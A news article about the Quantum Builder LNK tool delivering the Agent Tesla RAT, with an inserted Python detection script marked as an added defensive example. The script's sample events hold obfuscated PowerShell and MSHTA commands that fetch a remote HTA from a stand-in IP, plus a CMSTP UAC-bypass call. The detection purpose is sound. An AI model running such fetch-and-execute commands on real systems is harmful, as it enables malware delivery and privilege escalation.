Want to sneak a RAT into Windows? Buy Quantum Builder on the dark web – The Register


A tool sold on the dark web that allows cybercriminals to build malicious shortcuts for delivering malware is being used in a campaign pushing a longtime .NET keylogger and remote access trojan (RAT) named Agent Tesla.

The customizable tool, Quantum Builder (also known as Quantum LNK Builder), was seen for sale on cybercriminal markets in June by security researchers with Cyware. Quantum Builder lets attackers create malicious Microsoft Windows LNK shortcuts.

Through the shortcuts, cybercriminals can create and deliver malicious payloads using legitimate system tools like PowerShell and Microsoft HTML Application (HTA) files.

In a report this week, researchers detected a campaign using Quantum Builder to deliver Agent Tesla, malware that has been around since 2014 and has been used to steal sensitive information from a victim’s device, including user credentials, credentials from browsers, keystrokes, and clipboard data.

Quantum Builder has been linked to the advanced persistent threat (APT) gang Lazarus Group, based on shared tactics, techniques, and procedures (TTPs) and overlaps in source code, but the researchers can’t with any confidence attribute the current campaign to Lazarus or any particular threat group.

Malware as a service is cheaper than you think

Quantum Builder, which Cyware says could be had for about $200 for two months of access to up to $950 for lifetime access, can generate LNK, HTA, and ISO payloads that include sophisticated download techniques and deliver the final payload via a multi-staged attack chain.

That includes decrypting in-memory PowerShell scripts using the HTA file to bypass User Account Control (UAC) through Microsoft Connection Manager Profile Installer (CMSTP) – a program used to install Connection Manager service profiles – to launch Agent Tesla with administrative rights.

The UAC bypass is also used to set Windows Defender exclusions on the system.

Quantum Builder also uses other detection-evasion and camouflage techniques, including living-off-the-land binaries (LOLBins), which are legitimate Microsoft tools. It also “incorporates techniques like decoys, UAC Prompts and in-memory PowerShell to execute the final payload,” the researchers found, adding that “these Techniques are regularly updated by the Developers of the Quantum Builder.”

The infection chain starts with a spearphishing email whose subject line poses as an order confirmation from GuangDong Nanz Technology, a Chinese manufacturing company. The email includes the LNK file bundled in a GZIP archive that, once executed by the victim, runs the embedded PowerShell code that launches MSHTA, which then executes an HTA file hosted on a remote server.

“The HTA File then decrypts a PowerShell loader script which decrypts and loads another PowerShell script after performing AES Decryption and GZIP Decompression,” they wrote. “The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server, and then executes it with administrative privileges by performing a UAC Bypass using the CMSTP.” 

Agent Tesla is then executed on the victim’s machine with administrative privileges.

ThreatLabz analysts found multiple samples that use a variation of the infection chain to deliver Agent Tesla, with the LNK file bundled in a ZIP archive. In this variant, the LNK file also executes the HTA file hosted on the remote server, but it first decodes its command by converting the integers in the command into characters and replacing whitespace; it then uses MSHTA to execute the HTA file from the remote URL.
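As an added defensive illustration (not code from the article, Zscaler or Cyware), the following Python triage sketch flags the Explorer → PowerShell → MSHTA/CMSTP sequence described above in constructed process-creation events and decodes the integer-to-character obfuscation mentioned for the ZIP variant; the event format and the sample command lines are assumptions.

```python
"""Triage helper for the LNK -> PowerShell -> MSHTA chain described above.
Added example, not code from the article, Zscaler or Cyware. Assumes process
events as dicts with 'parent', 'image', 'cmdline'; the integer-to-character
obfuscation is modelled as a run of decimal values, optionally in [char] casts."""
import re

# A run of >= 8 two- or three-digit integers separated by ',', '+' or spaces,
# each optionally prefixed with a PowerShell [char] cast.
INT_RUN = re.compile(
    r"(?:\[char\]\s*)?\b\d{2,3}\b(?:\s*[,+ ]\s*(?:\[char\]\s*)?\b\d{2,3}\b){7,}"
)

def decode_int_chars(cmdline: str) -> list[str]:
    """Turn each integer run back into text, mirroring the loader's decode step
    so the analyst sees the real command. Non-printable runs are skipped."""
    out = []
    for m in INT_RUN.finditer(cmdline):
        vals = [int(v) for v in re.findall(r"\d{2,3}", m.group(0))]
        if all(32 <= v <= 126 for v in vals):
            out.append("".join(chr(v) for v in vals))
    return out

def triage(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, reason) for each event matching a stage of the chain."""
    hits = []
    for i, e in enumerate(events):
        parent, image = e["parent"].lower(), e["image"].lower()
        # Match on the raw command line plus anything decoded from integer runs.
        text = " ".join([e["cmdline"], *decode_int_chars(e["cmdline"])]).lower()
        if (image.endswith("powershell.exe") and parent.endswith("explorer.exe")
                and "mshta" in text and "http" in text):
            hits.append((i, "LNK-launched PowerShell invoking MSHTA on a remote HTA"))
        elif (image.endswith("mshta.exe") and parent.endswith("powershell.exe")
                and re.search(r"https?://", text)):
            hits.append((i, "MSHTA spawned by PowerShell fetching a remote HTA"))
        elif image.endswith("cmstp.exe") and parent.endswith("powershell.exe"):
            hits.append((i, "CMSTP launched from PowerShell (UAC bypass pattern)"))
    return hits

# Constructed sample events; 203.0.113.5 is a documentation-range address.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c \"$s=109,115,104,116,97,32,104,116,116,"
                "112,58,47,47,50,48,51,46,48,46,49,49,51,46,53,47,120,46,104,116,"
                "97; -join ($s | % {[char]$_})\""},
    {"parent": "powershell.exe", "image": "mshta.exe",
     "cmdline": "mshta http://203.0.113.5/x.hta"},
    {"parent": "powershell.exe", "image": "cmstp.exe", "cmdline": "cmstp.exe C:\\tmp\\p.inf"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell -c Get-Date"},
]
```

Running `triage(SAMPLE_EVENTS)` flags the first three events and leaves the benign `Get-Date` invocation alone.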

In their report in June, the Cyware team said there were advantages to attackers using …….

Source: https://www.theregister.com/2022/09/28/quantum_builder_agent_tesla_rat/
